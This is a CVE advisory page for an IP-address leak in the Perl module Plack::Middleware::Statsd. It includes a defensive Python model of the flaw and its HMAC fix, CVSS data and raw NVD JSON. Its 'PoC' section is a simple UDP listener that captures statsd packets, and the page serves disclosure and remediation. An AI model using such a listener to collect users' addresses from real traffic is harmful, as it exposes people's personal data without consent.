Security Vulnerability Report
CVE-2026-45179 CVSS 5.3 MEDIUM

Published: 2026-05-10 20:16:29
Last Modified: 2026-05-12 16:48:58
Source: 9b29abf9-4ab0-4765-b253-1875cd9b441e

Description

Plack::Middleware::Statsd versions before 0.9.0 for Perl may leak user IP addresses.

If the communication channel to the statsd daemon is not secured (for example, by sending UDP packets to a host on another network), then users' IP addresses may be leaked to anyone able to observe that traffic (CWE-319, cleartext transmission of sensitive information).

Since version 0.9.0, the IP address is no longer logged to statsd unless configured. When configured, an HMAC of the IP address (a keyed hash, so the address cannot be recovered from the tag without the key) is logged instead.
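The following Python is an added example, not code from this page or from Plack::Middleware::Statsd itself. It models the three behaviours described above: a pre-0.9.0-style metric that carries the raw client address, the 0.9.0-style default that omits it, and the configured form that substitutes an HMAC-SHA256 tag. It also includes a wire-level check that scans an outgoing statsd payload for IP literals, which is how you would verify a deployment from the sending side (or from a receiver like the PoC below). The metric names, the sample request environment and the key are constructed for illustration and are not the module's real ones.

```python
from __future__ import annotations

import hashlib
import hmac
import ipaddress
import re

# Constructed sample request environment (PSGI-style keys); not a real capture.
SAMPLE_ENV = {
    "REMOTE_ADDR": "192.0.2.10",
    "REQUEST_METHOD": "GET",
    "PATH_INFO": "/login",
}


def pseudonymize_ip(ip: str, key: bytes, length: int = 16) -> str:
    """Keyed pseudonym for a client IP: HMAC-SHA256 under a secret key, hex-truncated.

    Same IP and same key give the same tag, so per-client counting still works,
    but an observer of the statsd channel cannot recover the IP without the key.
    An unkeyed hash would not do: the 2^32 IPv4 space can be enumerated and
    matched against observed digests quickly.
    """
    tag = hmac.new(key, ip.encode("ascii"), hashlib.sha256).hexdigest()
    return tag[:length]


def metrics_vulnerable(env: dict) -> list[str]:
    """Pre-0.9.0-style behaviour: the raw client IP ends up inside a metric name.

    Metric names here are hypothetical, not the module's real ones.
    """
    return [
        f"app.request.{env['REQUEST_METHOD']}:1|c",
        f"app.client.{env['REMOTE_ADDR']}:1|c",
    ]


def metrics_hardened(env: dict, key: bytes | None = None) -> list[str]:
    """0.9.0-style behaviour: no client metric unless a key is configured;
    when it is, an HMAC tag stands in for the address."""
    lines = [f"app.request.{env['REQUEST_METHOD']}:1|c"]
    if key is not None:
        lines.append(f"app.client.{pseudonymize_ip(env['REMOTE_ADDR'], key)}:1|c")
    return lines


# Candidate IPv4 / IPv6 literals inside a statsd payload; each hit is validated
# with the ipaddress module. statsd uses ':' as its name/value separator, so an
# IPv6 candidate may absorb the trailing ':<value>'; treat any hit as a leak to
# review rather than as an exact address.
_IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
_IPV6 = re.compile(r"(?<![0-9A-Fa-f])(?:[0-9A-Fa-f]{1,4}:){1,7}[0-9A-Fa-f:]+(?![0-9A-Fa-f])")


def ip_literals_in(payload: str) -> list[str]:
    """Wire-level check: every valid IP literal found in an outgoing statsd payload."""
    found = []
    for pattern in (_IPV4, _IPV6):
        for tok in pattern.findall(payload):
            try:
                found.append(str(ipaddress.ip_address(tok)))
            except ValueError:
                continue
    return found


if __name__ == "__main__":
    key = b"constructed-secret-key"  # in practice a real secret from config, never from source
    for label, lines in (
        ("vulnerable", metrics_vulnerable(SAMPLE_ENV)),
        ("hardened, IP off", metrics_hardened(SAMPLE_ENV)),
        ("hardened, HMAC", metrics_hardened(SAMPLE_ENV, key)),
    ):
        payload = "\n".join(lines)
        print(f"{label}: {lines} -> IP literals: {ip_literals_in(payload)}")
```

Running it shows the vulnerable payload flagged with the literal 192.0.2.10 while neither hardened form contains an address; the HMAC tag is stable for a given key, so counts per client remain meaningful, and rotating the key makes old tags unlinkable to new ones.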

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No CPE configuration data is available for this entry (NVD status: Deferred). Affected product, per the description and the vendor advisory:

Plack::Middleware::Statsd < 0.9.0 (fixed in 0.9.0)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket

# Simple PoC: receiving UDP packets to demonstrate IP leakage in Plack::Middleware::Statsd.
# This script listens on UDP port 8125 (the default statsd port) on all interfaces. It only
# sees metrics if the application has been pointed at this host or its statsd traffic is
# routed here; it does not passively sniff another host's packets.
# Port 8125 is not a privileged port, so root is normally not needed; the PermissionError
# handler below covers hosts where local policy restricts binding.
UDP_IP = "0.0.0.0"
UDP_PORT = 8125

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
    sock.bind((UDP_IP, UDP_PORT))
    print(f"[*] Listening on {UDP_IP}:{UDP_PORT} for statsd traffic...")
    while True:
        data, addr = sock.recvfrom(1024)  # buffer size is 1024 bytes
        message = data.decode("utf-8", errors="ignore")
        # In a real scenario, a regex would parse specific stat patterns containing IPs
        print(f"[+] Captured packet from {addr}: {message}")
except PermissionError:
    print("[!] Error: Permission denied. Run as root/admin.")
except KeyboardInterrupt:
    print("\n[*] Stopping listener.")
finally:
    sock.close()

References

https://github.com/robrwo/Plack-Middleware-Statsd/security/advisories/GHSA-9gwm-665p-w2xx (vendor advisory)
https://metacpan.org/release/RRWO/Plack-Middleware-Statsd-v0.9.0/changes (release notes for the fixed version, 0.9.0)
http://www.openwall.com/lists/oss-security/2026/05/10/4 (oss-security mailing list post)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-45179",
    "sourceIdentifier": "9b29abf9-4ab0-4765-b253-1875cd9b441e",
    "published": "2026-05-10T20:16:28.967",
    "lastModified": "2026-05-12T16:48:58.260",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Plack::Middleware::Statsd versions before 0.9.0 for Perl may leak user IP addresses.\n\nIf the communication channel to the statsd daemon is not secured (for example, by sending UDP packets to a host on another network), then users' IP addresses may be leaked.\n\nSince version 0.9.0, the IP address is no longer logged to statsd unless configured. When configured, an HMAC signature of the IP address is logged instead."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-319"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/robrwo/Plack-Middleware-Statsd/security/advisories/GHSA-9gwm-665p-w2xx",
        "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e"
      },
      {
        "url": "https://metacpan.org/release/RRWO/Plack-Middleware-Statsd-v0.9.0/changes",
        "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e"
      },
      {
        "url": "http://www.openwall.com/lists/oss-security/2026/05/10/4",
        "source": "af854a3a-2127-422b-91ae-364da2661108"
      }
    ]
  }
}